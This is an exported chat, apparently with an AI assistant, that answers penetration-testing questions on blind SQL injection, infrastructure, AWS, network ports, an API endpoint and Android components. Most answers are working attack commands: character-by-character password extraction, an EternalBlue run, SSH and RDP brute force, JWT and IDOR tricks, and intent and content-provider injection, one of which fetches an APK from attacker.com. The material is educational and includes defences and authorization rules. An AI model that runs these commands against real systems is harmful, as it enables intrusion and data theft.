Penetration Testing — Full Chat History
claude.ai · Security Assessment Session
- 01 Blind SQL Injection – DB Dump
- 02 SQL Injection Queries Explained
- 03 SUBSTRING Function
- 04 Extract One User Step by Step
- 05 Infrastructure Pentesting
- 06 AWS Security Assessment
- 07 AWS Open SSH Port 0.0.0.0/0
- 08 Network Pentest — 4 Open Ports
- 09 API Endpoint /api/user/1001
- 10 Android Security Assessment
- 11 All Questions Summary
Can someone extract or dump a database if the server is vulnerable to blind SQL injection?
Blind SQL Injection – Database Extraction
Yes, an attacker can extract/dump a database through blind SQL injection, even without direct output. Here's how it works conceptually:
How Blind SQLi Works
In blind SQLi, the server returns no data directly — instead, attackers infer information by asking true/false questions to the database, observing differences in:
- Boolean-based: Page behavior changes (different content, errors, redirects)
- Time-based: Response delays (e.g., SLEEP(5) confirms true conditions)
The Extraction Process
1. Confirm Vulnerability
' AND 1=1-- → normal response ✓
' AND 1=2-- → different response ✓ (confirms blind SQLi)
2. Enumerate Database Metadata — character-by-character extraction:
' AND SUBSTRING(database(),1,1)='a'-- → true/false
' AND SUBSTRING(database(),1,1)='b'-- → true/false
...repeat for each character
3. Dump Table/Column Names
' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u'--
4. Extract Row Data
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
5. Time-Based (when no visual difference exists)
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--
Defenses
| Defense | How it helps |
|---|---|
| Parameterized queries / prepared statements | Eliminates injection entirely |
| Input validation & WAF | Blocks malicious payloads |
| Least privilege DB accounts | Limits what can be read even if exploited |
| Rate limiting | Slows down automated extraction |
| Error suppression | Removes timing/behavioral leaks |
The bottom line: blind SQLi is slower than standard SQLi but just as dangerous — a full database dump is absolutely achievable. Parameterized queries remain the only reliable prevention.
Can you tell me like what these queries are doing?
Query Breakdown
1. Confirm Vulnerability
' AND 1=1--
' AND 1=2--
- The `'` closes the original string in the SQL query
- `AND 1=1` is always true → page loads normally
- `AND 1=2` is always false → page behaves differently
- `--` comments out the rest of the original query
2. Extract Database Name
' AND SUBSTRING(database(),1,1)='a'--
- `database()` → returns the current database name
- `SUBSTRING(database(), 1, 1)` → extracts 1 character starting at position 1
- `= 'a'` → asks "is the first character 'a'?"
- Repeat for position 2, 3, 4... until the full name is known
3. Extract Table Names
' AND SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)='u'--
- `information_schema.tables` → a built-in MySQL table that lists all tables
- `SELECT table_name ... LIMIT 1` → picks the first table name
- `SUBSTRING(..., 1, 1) = 'u'` → asks "does the first table name start with 'u'?"
4. Extract Actual Data
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
- `SELECT password FROM users LIMIT 1` → grabs the first password
- Repeat for each character position to reconstruct the full password
5. Time-Based
' AND IF(SUBSTRING(database(),1,1)='a', SLEEP(5), 0)--
- `IF(condition, true_action, false_action)` → standard if/else
- If the first character is 'a' → `SLEEP(5)` (server pauses 5 seconds)
- Attacker measures response time to determine true/false
Summary
| Query | What it extracts |
|---|---|
| 1=1 vs 1=2 | Confirms injection exists |
| SUBSTRING(database(),...) | Database name |
| information_schema.tables | Table names |
| SELECT password FROM users | Actual sensitive data |
| IF(..., SLEEP(5), 0) | Same as above but via timing |
What is it extracting? (shared excerpt: "SUBSTRING(database(), 1, 1) → extracts 1 character starting at position 1 (first character)")
Breaking It Down
SUBSTRING(database(), 1, 1)
| Part | Meaning |
|---|---|
database() | Returns the name of the current database (e.g., "shopdb") |
First 1 | Start position — start from character number 1 (the beginning) |
Second 1 | Length — extract only 1 character |
Example
If the database name is "shopdb":
SUBSTRING("shopdb", 1, 1) → "s"
SUBSTRING("shopdb", 2, 1) → "h"
SUBSTRING("shopdb", 3, 1) → "o"
SUBSTRING("shopdb", 4, 1) → "p"
In blind SQL injection, the attacker pulls out the database name one character at a time by asking yes/no questions like "is this character equal to 's'?"
Suppose that you have found there is a parameter "user" that is vulnerable. How would you perform this — extract only one user from the database, step by step?
Scenario
You found that the user parameter is vulnerable:
https://example.com/profile?user=john
Step 1: Confirm the Injection
?user=john' AND 1=1-- → normal page ✓
?user=john' AND 1=2-- → different/broken page ✓
Confirmed vulnerable.
Step 2: Find the Database Name Length
?user=john' AND LENGTH(database())=6--
Try 1, 2, 3... until you get a true response.
Step 3: Extract Database Name Character by Character
?user=john' AND SUBSTRING(database(),1,1)='s'-- → true
?user=john' AND SUBSTRING(database(),2,1)='h'-- → true
?user=john' AND SUBSTRING(database(),3,1)='o'-- → true
?user=john' AND SUBSTRING(database(),4,1)='p'-- → true
?user=john' AND SUBSTRING(database(),5,1)='d'-- → true
?user=john' AND SUBSTRING(database(),6,1)='b'-- → true
✅ Database name = shopdb
Step 4: Find the Table Name
?user=john' AND SUBSTRING((SELECT table_name FROM information_schema.tables
WHERE table_schema='shopdb' LIMIT 1),1,1)='u'--
✅ Table name = users
Step 5: Find Column Names
?user=john' AND SUBSTRING((SELECT column_name FROM information_schema.columns
WHERE table_name='users' LIMIT 1),1,1)='i'--
✅ Columns found = id, username, password, email
Step 6: Extract One User's Data
Extract username:
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),2,1)='d'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),3,1)='m'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),4,1)='i'--
?user=john' AND SUBSTRING((SELECT username FROM users LIMIT 1),5,1)='n'--
✅ Username = admin
Extract password:
?user=john' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='5'--
?user=john' AND SUBSTRING((SELECT password FROM users LIMIT 1),2,1)='f'--
... and so on
Key Points
- Every `LIMIT 1` ensures you're only targeting one row
- Use `LIMIT 1 OFFSET 1` for the second user, `OFFSET 2` for the third
- `--` at the end comments out the remaining SQL to prevent errors
- Manually doing this takes hundreds of requests; tools like sqlmap automate this entirely
You are doing pentesting and you got infrastructure. How would you do infrastructure pentesting?
Infrastructure Pentesting Methodology
Phase 1: Reconnaissance
Passive Recon:
- WHOIS lookup → domain ownership, registrar info
- DNS enumeration → subdomains, MX records, NS records
- Google dorking → exposed files, login pages
- Shodan/Censys → open ports, banners, exposed services
- LinkedIn/job postings → tech stack hints
Active Recon:
- Ping sweeps → find live hosts
- DNS zone transfer attempts
- Banner grabbing → identify software versions
Phase 2: Scanning & Enumeration
# Discover live hosts
nmap -sn 192.168.1.0/24
# Full port scan
nmap -sV -sC -p- 192.168.1.10
# OS detection
nmap -O 192.168.1.10
| Port/Service | What to Enumerate |
|---|---|
| 21 (FTP) | Anonymous login, version |
| 22 (SSH) | Version, weak credentials |
| 25 (SMTP) | Open relay, user enumeration |
| 80/443 (HTTP/S) | Web tech, directories |
| 445 (SMB) | Shares, null sessions |
| 3306 (MySQL) | Remote access, default creds |
| 3389 (RDP) | Version, brute force |
Phase 3: Vulnerability Assessment
# Nikto web server scan
nikto -h http://192.168.1.10
# SMB vulnerabilities
nmap --script smb-vuln* 192.168.1.10
# Check CVEs
searchsploit apache 2.4.49
Phase 4: Exploitation
1. Unpatched services → known CVE exploits (Metasploit)
2. Weak credentials → brute force SSH, RDP, FTP
3. Misconfigured SMB → null sessions, exposed shares
4. Default credentials → routers, printers, admin panels
5. SSL/TLS issues → POODLE, Heartbleed, BEAST
6. Open ports → exposed internal services
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
run
Phase 5: Post-Exploitation
- Privilege escalation → get root/SYSTEM access
- Credential dumping → extract hashes (mimikatz)
- Lateral movement → pivot to other machines
- Persistence check → could attacker maintain access?
- Data access audit → what sensitive data is reachable?
- Network sniffing → intercept internal traffic
Phase 6: Lateral Movement
Initial Access
↓
Dump credentials / find SSH keys
↓
Use credentials on other machines
↓
Reach domain controller / core servers
↓
Full network compromise
Phase 7: Reporting
1. Executive Summary → high-level risk overview
2. Scope & Methodology → what was tested, how
3. Findings → each vuln with description,
risk rating, evidence, remediation
4. Attack Chain → how far you got step by step
5. Recommendations → prioritized fixes
Key Rules
- Always stay within agreed scope
- Get written authorization before starting
- Document everything as you go
- Never cause unnecessary disruption to live systems
- Follow responsible disclosure for critical findings
If you got AWS creds, how would you do a security assessment? Step by step?
AWS Security Assessment
Pre-requisites
# Install AWS CLI
pip install awscli
# Configure credentials
aws configure
# Enter: Access Key ID, Secret Access Key, Region
Phase 1: Identify Who You Are
# Who am I?
aws sts get-caller-identity
# Returns: Account ID, User ARN, User ID
Phase 2: Enumerate IAM Permissions
aws iam list-users
aws iam list-groups
aws iam list-attached-user-policies --user-name <username>
aws iam list-roles
aws iam list-user-policies --user-name <username>
# Tool: enumerate-iam
python enumerate-iam.py --access-key <key> --secret-key <secret>
Phase 3: S3 Bucket Assessment
aws s3 ls
aws s3 ls s3://bucket-name
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
aws s3api get-public-access-block --bucket bucket-name
aws s3api get-bucket-encryption --bucket bucket-name
aws s3api get-bucket-versioning --bucket bucket-name
Phase 4: EC2 Assessment
aws ec2 describe-instances
aws ec2 describe-security-groups
# Look for 0.0.0.0/0 rules
aws ec2 describe-security-groups \
--query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]]'
aws ec2 describe-snapshots --owner-ids self
Phase 5: IAM Deep Dive
aws iam get-account-password-policy
aws iam list-virtual-mfa-devices
aws iam list-access-keys --user-name <username>
aws iam list-entities-for-policy \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Phase 6: Network Assessment (VPC)
aws ec2 describe-vpcs
aws ec2 describe-subnets
aws ec2 describe-network-acls
aws ec2 describe-flow-logs
aws ec2 describe-internet-gateways
Phase 7: Logging & Monitoring
aws cloudtrail describe-trails
aws cloudtrail get-trail-status --name <trail-name>
aws cloudwatch describe-alarms
aws guardduty list-detectors
Phase 8: Other Services
aws lambda list-functions
aws rds describe-db-instances
aws secretsmanager list-secrets
aws ssm describe-parameters
aws sqs list-queues
Phase 9: Privilege Escalation Checks
Common escalation paths:
- iam:CreatePolicyVersion → replace policy with admin policy
- iam:AttachUserPolicy → attach admin policy to self
- iam:PassRole + ec2:RunInstances → launch EC2 with admin role
- lambda:CreateFunction → run code as admin role
- sts:AssumeRole → assume more privileged role
# Tool: Pacu (AWS exploitation framework)
python3 pacu.py
Common Critical Findings
| Finding | Risk |
|---|---|
| Public S3 buckets with sensitive data | Critical |
| No MFA on root/admin accounts | Critical |
| CloudTrail disabled | High |
| SSH open to 0.0.0.0/0 | High |
| Old unused access keys | High |
| No GuardDuty | Medium |
| Unencrypted RDS/EBS | Medium |
| Overly permissive IAM roles | High |
If you got this 0.0.0.0/0 TCP 22 finding in AWS, what tests do you perform and how do you mitigate it?
What Does 0.0.0.0/0 TCP 22 Mean?
0.0.0.0/0 = ANY IP address in the world
TCP 22 = SSH port
Translation: Anyone on the internet can attempt to connect via SSH
Tests to Perform
1. Verify the Finding
aws ec2 describe-security-groups \
--query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`] && ToPort==`22`]]'
2. Check SSH is Running
nmap -sV -p 22 <public-ip>
3. Check CVEs
searchsploit openssh <version>
nmap --script ssh-vuln* -p 22 <ip>
nmap --script ssh2-enum-algos -p 22 <ip>
| CVE | Description | Risk |
|---|---|---|
| CVE-2023-38408 | Remote code execution | Critical |
| CVE-2016-6210 | User enumeration | Medium |
| CVE-2018-15473 | User enumeration | Medium |
| CVE-2019-6111 | SCP path traversal | Medium |
4. Auth Method Check
nmap --script ssh-auth-methods -p 22 <ip>
# Bad findings:
# - Password authentication enabled
# - Root login permitted
5. Brute Force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://<ip> -t 4
medusa -h <ip> -u root -P rockyou.txt -M ssh
6. Check SSH Config (if access gained)
cat /etc/ssh/sshd_config
# Bad settings:
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
Protocol 1
Mitigation Steps
1. Restrict Security Group
# Remove the 0.0.0.0/0 rule
aws ec2 revoke-security-group-ingress \
--group-id sg-xxxxxxxx --protocol tcp --port 22 --cidr 0.0.0.0/0
# Allow only YOUR IP
aws ec2 authorize-security-group-ingress \
--group-id sg-xxxxxxxx --protocol tcp --port 22 --cidr <your-ip>/32
2. Disable Password Auth
PasswordAuthentication no
PermitRootLogin no
PermitEmptyPasswords no
MaxAuthTries 3
Protocol 2
3. Use SSM Instead of SSH
aws ssm start-session --target <instance-id>
4. Enable Fail2Ban
[sshd]
enabled = true
maxretry = 3
bantime = 3600
5. Use Strong Keys
ssh-keygen -t ed25519 -C "your@email.com"
# or RSA 4096
ssh-keygen -t rsa -b 4096
Risk Rating
| Issue | Risk |
|---|---|
| SSH open to 0.0.0.0/0 | 🔴 Critical |
| Password auth enabled | 🔴 Critical |
| Root login permitted | 🔴 Critical |
| Old OpenSSH version | 🟠 High |
| No fail2ban | 🟠 High |
| No CloudWatch alerts | 🟡 Medium |
During network pentesting, an nmap scan shows TCP 22, TCP 80, TCP 443 and TCP 3389. What do you do? What test cases will you test?
TCP 22 — SSH
nmap -sV -p 22 <ip>
nmap --script ssh-auth-methods -p 22 <ip>
nmap --script ssh2-enum-algos -p 22 <ip>
hydra -L users.txt -P passwords.txt ssh://<ip>
searchsploit openssh <version>
Look for: Password auth enabled, root login, old version, weak algorithms, user enumeration
TCP 80 — HTTP
1. Fingerprint
nmap -sV -p 80 <ip>
curl -I http://<ip>
whatweb http://<ip>
2. Directory Enumeration
gobuster dir -u http://<ip> -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u http://<ip>
# Check: /admin /login /backup /config /.git /api /phpinfo.php
3. Vulnerability Scan
nikto -h http://<ip>
nmap --script http-vuln* -p 80 <ip>
4. CMS Scanning
wpscan --url http://<ip> --enumerate u,p,t # WordPress
joomscan -u http://<ip> # Joomla
droopescan scan drupal -u http://<ip> # Drupal
5. HTTP Methods
nmap --script http-methods -p 80 <ip>
curl -X OPTIONS http://<ip> -v
TCP 443 — HTTPS
All HTTP tests PLUS:
SSL/TLS Assessment
sslscan <ip>:443
testssl.sh <ip>
nmap --script ssl-enum-ciphers -p 443 <ip>
nmap --script ssl-heartbleed -p 443 <ip>
nmap --script ssl-poodle -p 443 <ip>
Certificate Analysis
openssl s_client -connect <ip>:443
# Check: expiry, self-signed, SHA1 vs SHA256, domain mismatch
Bad Protocols: SSLv2, SSLv3, TLS 1.0, TLS 1.1
Good Protocols: TLS 1.2 ✓, TLS 1.3 ✓
Security Headers to Check:
Strict-Transport-Security (HSTS)
Content-Security-Policy (CSP)
X-Frame-Options
X-Content-Type-Options
TCP 3389 — RDP
1. BlueKeep Check (Critical)
nmap --script rdp-vuln-ms12-020 -p 3389 <ip>
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <ip>
run
2. Encryption & NLA Check
nmap --script rdp-enum-encryption -p 3389 <ip>
# If NLA not enforced → anyone can reach login screen
3. Brute Force
hydra -L users.txt -P passwords.txt rdp://<ip>
crowbar -b rdp -s <ip>/32 -u administrator -C passwords.txt
Complete Test Summary
| Port | Service | Key Tests | Critical Findings |
|---|---|---|---|
| 22 | SSH | Brute force, CVEs, auth methods | Password auth on, root login |
| 80 | HTTP | Nikto, gobuster, SQLi, CMS | Admin exposed, SQLi, default creds |
| 443 | HTTPS | SSL scan, cert check, HTTP tests | Heartbleed, weak TLS, no HSTS |
| 3389 | RDP | BlueKeep, brute force, NLA | BlueKeep vuln, no NLA |
Tools Summary
nmap · nikto · gobuster · wpscan · sslscan · testssl.sh · hydra · metasploit · searchsploit
What test cases do you perform on this endpoint, /api/user/1001?
What This Endpoint Tells Us
/api/user/1001
↑
numeric ID → likely sequential → IDOR risk immediately
1. IDOR — Most Critical
GET /api/user/1000 # try other users
GET /api/user/1002
GET /api/user/1
GET /api/user/0
GET /api/user/-1
GET /api/user/99999999
2. HTTP Method Testing
GET /api/user/1001 → read
POST /api/user/1001 → create?
PUT /api/user/1001 → update
PATCH /api/user/1001 → partial update
DELETE /api/user/1001 → can you delete?
OPTIONS /api/user/1001 → what methods allowed?
3. Authentication Testing
# No token
GET /api/user/1001 (no Authorization header)
# Empty / invalid token
Authorization: Bearer
Authorization: Bearer invalidtoken123
# Expired token
Authorization: Bearer <old-expired-token>
4. Authorization / Privilege Escalation
# User B token accessing User A data
GET /api/user/1001
Authorization: Bearer <user_B_token>
# Role bypass via parameters
GET /api/user/1001?role=admin
GET /api/user/1001?admin=true
GET /api/user/1001?debug=true
5. SQL Injection
GET /api/user/1001'
GET /api/user/1001--
GET /api/user/1001 AND 1=1
GET /api/user/1001; SLEEP(5)--
GET /api/user/1001 UNION SELECT null,null,null--
GET /api/user/1001%27
6. Input Validation & Fuzzing
GET /api/user/abc
GET /api/user/null
GET /api/user/NaN
GET /api/user/<script>alert(1)</script>
GET /api/user/../../etc/passwd
GET /api/user/1001%00
GET /api/user/[1001]
7. Mass Assignment
PUT /api/user/1001
{
"username": "hacker",
"role": "admin", ← privilege escalation
"isAdmin": true,
"balance": 99999
}
8. Information Disclosure
# Check response for sensitive fields:
"password": "..." ← should NOT appear
"api_key": "sk-..." ← secret leak
"ssn": "..." ← PII
"credit_card": "..." ← critical
# Debug modes
GET /api/user/1001?debug=true
GET /api/user/1001?verbose=true
GET /api/user/1001.xml
9. Rate Limiting
ffuf -u http://target.com/api/user/FUZZ \
-w numbers.txt -mc 200
# No rate limit → can enumerate all users
10. JWT Testing
# Change alg to "none"
{"alg": "none", "typ": "JWT"}
# Modify payload
{"user_id": 1001, "role": "admin"}
# Tool
python3 jwt_tool.py <token> -M at
11. Security Headers
curl -I http://target.com/api/user/1001
# Should be present:
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Strict-Transport-Security: max-age=31536000
# Should NOT expose:
X-Powered-By: PHP/7.2
Server: Apache/2.4.1
Complete Test Summary
| Test | Tool | Risk if Vulnerable |
|---|---|---|
| IDOR | Burp, curl | Critical |
| Auth bypass | curl | Critical |
| SQLi | sqlmap, manual | Critical |
| Privilege escalation | Burp | Critical |
| Mass assignment | Burp | High |
| JWT attacks | jwt_tool | High |
| Rate limiting | ffuf, Burp | High |
| Info disclosure | curl | High |
| Input fuzzing | ffuf | Medium |
| Security headers | curl | Medium |
How do you do Android security assessment on the main Android components: Activities, Services, Broadcast Receivers, Content Provider?
Setup
# Tools needed
adb · apktool · jadx · frida · drozer · mobsf · burpsuite
# Connect device and pull APK
adb devices
adb shell pm list packages | grep target
adb pull /data/app/com.target.app/base.apk
Static Analysis First
apktool d target.apk -o output_folder
jadx -d output_folder target.apk
# Upload to MobSF for automated scan
# Key manifest flags to check:
android:debuggable="true" ← debug in prod
android:allowBackup="true" ← data extractable
android:exported="true" ← component exposed
android:usesCleartextTraffic="true" ← HTTP allowed
1. Activities
Activity = Screen/UI of the app (Login, Dashboard, Settings)
Static Analysis
grep -A5 "activity" AndroidManifest.xml
# Look for android:exported="true"
Launch Exported Activities (Bypass Login)
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DashboardActivity
adb shell am start -n com.target.app/.ProfileActivity \
--es "user_id" "admin" --ez "isAdmin" true
# Drozer
dz> run app.activity.info -a com.target.app
dz> run app.activity.start --component com.target.app com.target.app.AdminActivity
Intent Injection
adb shell am start -n com.target.app/.WebViewActivity \
-d "file:///etc/passwd"
adb shell am start -n com.target.app/.WebViewActivity \
--es "url" "javascript:alert(1)"
What to look for: Exported activities accessible without auth, login bypass, sensitive Intent extras, WebView with arbitrary URLs, task hijacking
2. Services
Service = Background process (music player, sync, upload)
Start/Stop Exported Services
adb shell am startservice -n com.target.app/.BackgroundService
adb shell am stopservice -n com.target.app/.BackgroundService
dz> run app.service.info -a com.target.app
dz> run app.service.start --component com.target.app com.target.app.SyncService
Malicious Intent to Service
adb shell am startservice -n com.target.app/.DownloadService \
--es "url" "http://attacker.com/malware.apk" \
--es "filename" "../../data/data/com.target.app/evil"
Frida Hook
Java.perform(function () {
    var SyncService = Java.use('com.target.app.SyncService');
    SyncService.onStartCommand.implementation = function (intent, flags, startId) {
        // log every Intent that reaches the service, then let the original handler run
        console.log('Service started with: ' + intent);
        return this.onStartCommand(intent, flags, startId);
    };
});
3. Broadcast Receivers
Receiver = Listens for events (BOOT_COMPLETED, SMS_RECEIVED, custom broadcasts)
Send Malicious Broadcasts
adb shell am broadcast -a com.target.app.RESET_PASSWORD \
-n com.target.app/.PasswordResetReceiver
adb shell am broadcast -a com.target.app.UPDATE_USER \
--es "role" "admin" --es "user_id" "1001"
# Fake payment confirmation
adb shell am broadcast -a com.target.app.PAYMENT_SUCCESS \
--es "order_id" "12345"
Sniff Broadcasts
dz> run app.broadcast.sniff --action com.target.app.USER_LOGGED_IN
# May leak: auth tokens, credentials, session IDs
What to look for: Sensitive actions triggered by any app, tokens leaked in broadcasts, payment manipulation, password reset without auth
4. Content Providers
Provider = Shared data store (Contacts, Media, custom DB)
Query Provider (Read Data)
adb shell content query --uri content://com.target.app.provider/users
adb shell content query --uri content://com.target.app.provider/users/1
dz> run app.provider.info -a com.target.app
dz> run app.provider.query content://com.target.app.provider/users
SQL Injection via Provider
# Projection SQLi
dz> run app.provider.query content://com.target.app.provider/users \
--projection "* FROM sqlite_master--"
# Selection SQLi
dz> run app.provider.query content://com.target.app.provider/users \
--selection "1=1"
# Automated scan
dz> run scanner.provider.injection -a com.target.app
dz> run scanner.provider.sqltables -a com.target.app
Insert / Update / Delete
adb shell content insert \
--uri content://com.target.app.provider/users \
--bind name:s:hacker --bind role:s:admin
adb shell content update \
--uri content://com.target.app.provider/users/1 \
--bind role:s:admin
Path Traversal
dz> run app.provider.read \
content://com.target.app.provider/../../../../data/data/com.target.app/databases/userdb.db
content://com.target.app.fileprovider/../shared_prefs/credentials.xml
content://com.target.app.fileprovider/../databases/app.db
Automated Scan
dz> run scanner.provider.finduris -a com.target.app
dz> run scanner.provider.injection -a com.target.app
dz> run scanner.provider.traversal -a com.target.app
Additional Checks
Data Storage
adb shell cat /data/data/com.target.app/shared_prefs/*.xml
adb shell sqlite3 /data/data/com.target.app/databases/app.db ".tables"
adb logcat | grep com.target.app
SSL Pinning Bypass
frida -U -f com.target.app -l ssl_pinning_bypass.js --no-pause
Complete Summary
| Component | Key Attack | Risk |
|---|---|---|
| Activity | Direct launch, bypass login | Critical |
| Service | Trigger sensitive background ops | High |
| Broadcast | Fake broadcasts, data intercept | High |
| Content Provider | SQLi, read full database | Critical |
| Data Storage | Read credentials, tokens | Critical |
| Network | MITM, intercept traffic | High |
Tools
MobSF · apktool · jadx · drozer · frida · adb · burpsuite · objection
Now give me all the questions I have asked you.
All Questions Asked — Summary
| # | Question | Topic |
|---|---|---|
| 01 | Can someone extract or dump a DB if the server is vulnerable to blind SQL injection? | SQL Injection |
| 02 | Can you tell me like what these queries are doing? | SQL Injection |
| 03 | What is it extracting? (SUBSTRING excerpt) | SQL Injection |
| 04 | Suppose the "user" parameter is vulnerable — extract only one user, step by step | SQL Injection |
| 05 | You are doing pentesting and got infrastructure — how would you do infrastructure pentesting? | Infrastructure |
| 06 | If you got AWS creds how would you do security assessment? Step by step? | AWS |
| 07 | If you got AWS 0.0.0.0/0 TCP 22 — what tests do you perform and how do you mitigate? | AWS / SSH |
| 08 | During network pentesting nmap shows TCP22, TCP80, TCP443, TCP3389 — what do you do? | Network Pentest |
| 09 | What are test cases you perform on endpoint /api/user/1001? | API Security |
| 10 | How do you do Android security assessment on Activities, Services, Broadcast Receivers, Content Provider? | Android |
| 11 | Now give me all the questions I have asked you. | Summary |
Total: 11 questions covering SQL Injection, Infrastructure Pentesting, AWS Security, Network Pentesting, API Security, and Android Security Assessment.